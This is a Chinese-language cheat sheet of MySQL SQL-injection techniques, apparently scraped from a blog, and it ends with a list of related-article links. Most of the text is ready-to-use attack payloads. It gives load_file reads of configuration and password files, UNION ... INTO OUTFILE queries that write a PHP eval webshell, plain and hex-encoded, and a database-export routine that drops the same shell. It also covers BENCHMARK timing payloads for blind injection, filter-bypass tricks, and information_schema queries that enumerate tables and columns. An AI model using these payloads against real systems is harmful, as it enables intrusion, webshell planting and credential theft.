mysql-常用注入渗透手法
mysql:
内置函数常用函数:left(), mid(), ord(), length(), benchmark(),load_file(), outfile(), concat(),
系统重要信息:system_user(), user(), current_user, session_user(), database(), version(),
ASCII码:select char(97,100,109,105,110 ) 回显:admin
16进制:select 0x61646D696E 回显:admin
注释方法: /* --
使用 /**/ 或者 + 代替空格
@@datadir 读取数据库路径
@@basedir MYSQL 安装路径
@@version_compile_os 操作系统
load_file:linux,windows写全路径时候,c:/1.txt, /var/www/1.php 路径均为左斜杠 /
c:/windows/php.ini c:/winnt/php.ini c:/windows/my.ini //管理员登陆过MYSQL会留下密码和用户名 c:/winnt/my.ini c:/boot.ini
/etc/password / /usr/local/httpd/conf/httpd.conf //也许能找到网站默认目录 /usr/local/apache2/conf/httpd.conf //也许能找到网站默认目录哦!FreeBSD下:
load_file(char(47)) 列出了此FreeBSD系统的根目录
读不出来的原因:1.权限不够: and (select count(*) from mysql.user)>0-- 如果返回OK,则表示有权限。如果Denied则NO
2.回显长度限制,Substring(load_file(A),0,50),Substring(load_file(A),50,100)一步一步读 3.concat()拼接
outfile:写入条件:1. 未过滤' ' 2.权限 3.得到网站物理路径
已经上传了JPG小马, union select 1,load_file( /var/www/xiaoma.jpg),3,4,5,6 into outfile '/var/www/xiaoma.php'/*
直接写入小马,union select 1,'<?php eval($_POST[cmd])?>',3,4,5,6 into outfile '/var/www/xm.php'/*
||
等价于
||
0x3C3F706870206576616C28245F504F53545B636D645D293F3E
数据库导出马:
create database Supers;
use Supers;
create table SuperT(code text);
insert into SuperT(code) values ("<?php @eval($_POST['cmd']);?>");
select * from SuperT into outfile "D:\\xxx\\shell.php";
drop database Supers;
BENCHMARK:重复执行。不仅可以在display_errors=Off时候,无法判断SQL正确与否。让我们盲注的时候判断技巧。而且可以用来DDOS攻击数据库!
id= union select ,benchmark(,md5('test')), from user where userid= and ord(substring(username,,))= /*
UNION SELECT IF(SUBSTRING(user_password,1 ,1) = CHAR(52),BENCHMARK(5000000,md5('test')),null) FROM mb_users WHERE user_group = 1;
绕过防注入:
id=-255+union+/*!select*/+1,2,3,4 +号代替被顾虑的空格, !
and 1=2 un%ion sel%ect 1,2,3,4,sys%tem_us%er() %绕过被过滤的SQL语句
爆表:
select 0,0,concat(table_name),0 from (select * from (select * from information_schema.tables where table_schema=16进制database() order by table_schema limit 0,1) t order by table_schema desc)t limit 1-- 爆出第1个表
select 0,0,concat(table_name),0 from (select * from (select * from information_schema.tables where table_schema=16进制database() order by table_schema limit 1,1) t order by table_schema desc)t limit 1-- 爆出第2个表
......爆出所有有用的表后,假如得到admin表: 0x61646D696E
select 0,0,concat(cast(count(*) as char)),0 from information_schema.columns where table_name=0x61646D696E and table_schema=database() limit 1-- 爆出ADMIN表的列数
select 0,0,concat(column_name) from (select * from (select * from information_schema.columns where table_name=0x61646D696E and table_schema=database() order by 1 limit 0,1) t order by 1 desc)t limit 1-- 爆出ADMIN表第一个列。即索引为0的列...
root或者足够权限可以爆数据库用户帐户,密码:user password
mysql-常用注入渗透手法的更多相关文章
- Mysql基本注入
实验环境:墨者学院Mysql手工注入漏洞测试靶场 后台源码没有进行任何字符过滤. 首先进入靶场环境 先用admin登陆试试 果然不行,这时看到用户登录下方有一个停机维护通知,点进去瞅瞅 看到这里链接上 ...
- MySQL的注入总结
0x01 MySQL 5.0以上和MySQL 5.0以下版本的区别 MySQL5.0以上版本存在一个叫information_schema的数据库,它存储着数据库的所有信息,其中保存着关于MySQL服 ...
- MySQL手工注入学习-1
MySQL手工注入学习 SQLi-labs 手工注入学习 以下是通过SLQi-labs平台的部分简单例题的手工注入过程 Less-1:union联合查询注入 页面提示:Please input the ...
- Mysql 常用 SQL 语句集锦
Mysql 常用 SQL 语句集锦 基础篇 //查询时间,友好提示 $sql = "select date_format(create_time, '%Y-%m-%d') as day fr ...
- MySQL常用命令和常见问题
MySQL常用命令和常见问题 --创建数据库并设置字符集 create database wip default character set utf8 collate utf8_general_ci; ...
- mysql常用基本操作
mysql常用操作 查看都有哪些库 show databases; 查看某个库的表 use 库名; show tables; 查看表的字段 desc 表名; 当前是哪个用户 select user() ...
- MySQL 常用的sql语句小结(待续)
mysql 常用的sql语句 1.查看数据库各个表中的记录数 USE information_schema; SELECT table_name,table_rows FROM tables WHER ...
- mysql常用操作语句
mysql常用操作语句 1.mysql -u root -p 2.mysql -h localhost -u root -p database_name 2.列出数据库: 1.show datab ...
- Mysql 常用 SQL 语句集锦 转载(https://gold.xitu.io/post/584e7b298d6d81005456eb53)
Mysql 常用 SQL 语句集锦 基础篇 //查询时间,友好提示 $sql = "select date_format(create_time, '%Y-%m-%d') as day fr ...
随机推荐
- 跳转AppStore 评分
-(void)goToAppStore { NSString *str = [NSString stringWithFormat: @"itms-apps://ax.itunes.apple ...
- MySQL性能调优与架构设计——第11章 常用存储引擎优化
第11章 常用存储引擎优化 前言: MySQL 提供的非常丰富的存储引擎种类供大家选择,有多种选择固然是好事,但是需要我们理解掌握的知识也会增加很多.每一种存储引擎都有各自的特长,也都存在一定的短处. ...
- jmeter 正则表达式
1.抓好请求,对着接口文档筛选好请求后,添加正则表达式 2.查看结果树,找到要提取的参数 3.书写正则 4.关联一下 5.直接跑一边就好,包成功,从数据库取的话,如果name:user,就直接参数化: ...
- CAS实战の自定义登录
由于每个版本的改动较大,所以先把版本号列出: 服务端版本:cas server 4.0.0 客户端版本:cas client 3.3.3 一.自定义登录页面 页面路径:/WebContent/WEB- ...
- struts2+ckeditor配置图片上传
又是一个漫漫长夜. 公司的编辑器坏了,用的是百度编辑器,上传图片的网址被框架给拦截了,我们本地怎么测试都没问题,放到服务器就这样了.和老李找了半天,疯了,没原因的. 笔者以前用过jsp+ckedito ...
- pycharm中安装可以贴图片的Markdown插件
方法一:(测试成功) 先安装官方推荐的Markdown support插件,再安装Paste images into MarkDown 如果Paste images into MarkDown插件在线 ...
- oracle 11gr2 2.04 em 更改 hostname 后无需重建资料库的方法
1) 备份删除$ORACKE_HOME/ xxxx-sid 的EM目录:复制要创建的xxx-sid EM 名称目录: 备份删除$ORACKE_HOME/oc4j/j2ee/ xxxx-sid 的EM目 ...
- SQL Server数据类型总结
1.char char [(n)]存储固定长度的非Unicode字符串数据.n定义字符串长度,并且必须是1到8,000之间的值.存储大小为n个字节. 2.varchar varchar [(n | m ...
- 在Windows Server 2008上部署免费的https证书
背景 后web时代,https加密的重要性不言而喻.主流浏览器均对http站点标记不安全,敦促web服务提供商尽快升级至https. 原先的https证书多由各大域名服务商提供,动辄成千上万的部署证书 ...
- openvswitch dpdk
作者:张华 发表于:2016-04-07版权声明:可以任意转载,转载时请务必以超链接形式标明文章原始出处和作者信息及本版权声明 ( http://blog.csdn.net/quqi99 ) 硬件要 ...